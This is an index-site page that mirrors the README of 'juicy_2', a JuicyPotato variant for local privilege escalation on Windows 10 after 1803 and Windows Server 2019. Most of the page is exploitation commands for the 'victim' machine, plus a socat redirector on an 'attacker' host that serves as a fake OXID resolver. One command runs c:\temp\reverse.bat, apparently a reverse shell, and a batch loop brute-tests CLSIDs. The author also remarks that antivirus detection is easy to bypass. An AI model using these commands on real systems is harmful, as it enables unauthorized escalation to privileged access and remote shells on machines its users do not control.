Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/decoder-it/juicy_2

juicypotato for win10 > 1803 & win server 2019

README


# juicy_2
JuicyPotato for Win10 > 1803 & Win Server 2019

Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/



Disclaimer:

This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSIDs and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) on newer Windows 10 and Windows Server 2019 platforms.

(I know, this version is caught by Defender and other AVs, but with some modifications to the code it's easy to bypass.)


A mandatory requirement is the ability to redirect traffic for port 135 to a forwarder machine under your control.

Feel free to improve the code; I was too lazy for this kind of stuff.



For testing a CLSID:

```
juicy_2 -z -x [ip of socat listener] -l [fake oxid resolver port] -n [local RPC server port] -c [CLSID to test]
```

Example:

on victim:

```
juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
```

on attacker (192.168.1.1):

```
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
```


For exploitation:

on victim:

```
juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat
```

on attacker (192.168.1.1):

```
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
```



Hunting for juicy CLSIDs with a simple batch script (reads one CLSID per line from `clsid.list` and appends each result to `out.txt`):

```bat
@echo off

FOR /F %%i IN (clsid.list) DO (
    .\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt
    timeout /t 2
)
```